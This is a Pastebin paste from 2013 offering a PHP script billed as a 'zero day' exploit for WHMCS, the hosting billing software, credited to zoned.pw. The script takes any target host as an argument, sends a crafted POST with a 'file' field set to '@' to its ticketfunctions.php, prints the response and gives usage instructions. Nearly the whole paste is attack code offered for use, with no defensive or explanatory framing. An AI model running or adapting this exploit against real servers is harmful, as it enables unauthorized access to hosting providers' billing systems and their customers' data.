Advertisement
Guest User

OH HOT DAMN. ZONED.PW ZERO DAY WHMCS EXPLOIT

a guest
Jul 11th, 2013
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. #!/usr/bin/php -f
  2. <?php
  3. #
  4. # ticketfunctions.php curl exploit
  5. # YOU JUST GOT ZONED
  6. # zoned.pw
  7. #
  8.  
  9. //
  10. // HTTP FILES,
  11. //
  12.  
  13. $target = $argv[1];
  14.  
  15. $postData = array();
  16. $postData[ 'file' ] = "@";
  17.  
  18. $ch = curl_init();
  19. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  20. curl_setopt($ch, CURLOPT_URL, "http://$target/ticketfunctions.php");
  21. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  22. curl_setopt($ch, CURLOPT_POST, 1);
  23. curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
  24. curl_setopt($ch, CURLOPT_TIMEOUT, 3);
  25. curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
  26. curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
  27. curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
  28. $buf = curl_exec ($ch);
  29. curl_close($ch);
  30. unset($ch);
  31.  
  32. echo $buf;
  33. ?>
  34.  
  35. Usage: php /pathtofile.php {target}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement